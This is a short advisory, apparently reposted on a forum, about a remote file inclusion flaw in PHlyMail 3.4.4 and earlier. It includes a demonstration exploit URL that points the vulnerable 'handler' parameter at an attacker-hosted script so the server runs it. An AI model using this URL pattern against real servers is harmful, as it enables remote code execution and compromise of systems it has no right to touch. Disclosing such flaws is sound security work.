PHlyMail Include File Bug in '_PM_['path']['handler']' Parameter Lets Remote Users Execute Arbitrary

Version(s): 3.4.4 and prior versions

Description: A vulnerability was reported in PHlyMail. A remote user can include and execute arbitrary code on the target system.

The 'handlers/email/mod.listmail.php' script does not properly validate user-supplied input in the '_PM_['path']['handler']' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]

Kacper (a.k.a. Rahim) discovered this vulnerability.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Source: /hvaonline/posts/list/3035.html#16990